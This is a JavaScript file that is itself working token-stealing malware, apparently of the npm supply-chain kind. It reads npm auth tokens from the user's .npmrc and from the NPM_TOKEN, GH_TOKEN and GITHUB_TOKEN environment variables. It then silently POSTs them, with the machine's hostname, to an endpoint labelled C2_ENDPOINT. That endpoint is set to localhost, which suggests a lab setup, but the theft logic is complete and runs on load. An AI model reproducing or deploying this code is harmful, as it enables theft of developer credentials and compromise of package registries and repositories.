67 lines
1.6 KiB
JavaScript
67 lines
1.6 KiB
JavaScript
const https = require('https');
|
|
const http = require('http');
|
|
const { execSync } = require('child_process');
|
|
const fs = require('fs');
|
|
const os = require('os');
|
|
const path = require('path');
|
|
|
|
const C2_ENDPOINT = 'http://localhost:8081';
|
|
const EXFIL_TARGET = 'github';
|
|
|
|
function harvestTokens() {
|
|
const tokens = [];
|
|
const home = os.homedir();
|
|
|
|
// Scan .npmrc
|
|
const npmrcPath = path.join(home, '.npmrc');
|
|
if (fs.existsSync(npmrcPath)) {
|
|
const content = fs.readFileSync(npmrcPath, 'utf8');
|
|
const matches = content.match(/_authToken\s*=\s*([^\s]+)/g);
|
|
if (matches) {
|
|
tokens.push(...matches.map(m => ({ type: 'npm', value: m.split('=')[1].trim() })));
|
|
}
|
|
}
|
|
|
|
// Environment variables
|
|
['NPM_TOKEN', 'GH_TOKEN', 'GITHUB_TOKEN'].forEach(envVar => {
|
|
if (process.env[envVar]) {
|
|
tokens.push({ type: envVar.toLowerCase(), value: process.env[envVar] });
|
|
}
|
|
});
|
|
|
|
return tokens;
|
|
}
|
|
|
|
function exfiltrate(data) {
|
|
try {
|
|
const payload = JSON.stringify({
|
|
timestamp: new Date().toISOString(),
|
|
hostname: os.hostname(),
|
|
data: data
|
|
});
|
|
|
|
const url = new URL(C2_ENDPOINT + '/api/npm/exfil');
|
|
const options = {
|
|
hostname: url.hostname,
|
|
port: url.port || 80,
|
|
path: url.pathname,
|
|
method: 'POST',
|
|
headers: {
|
|
'Content-Type': 'application/json',
|
|
'Content-Length': Buffer.byteLength(payload)
|
|
}
|
|
};
|
|
|
|
const req = http.request(options);
|
|
req.write(payload);
|
|
req.end();
|
|
} catch (e) {}
|
|
}
|
|
|
|
// Main execution
|
|
try {
|
|
const tokens = harvestTokens();
|
|
if (tokens.length > 0) {
|
|
exfiltrate({ tokens });
|
|
}
|
|
} catch (e) {}
|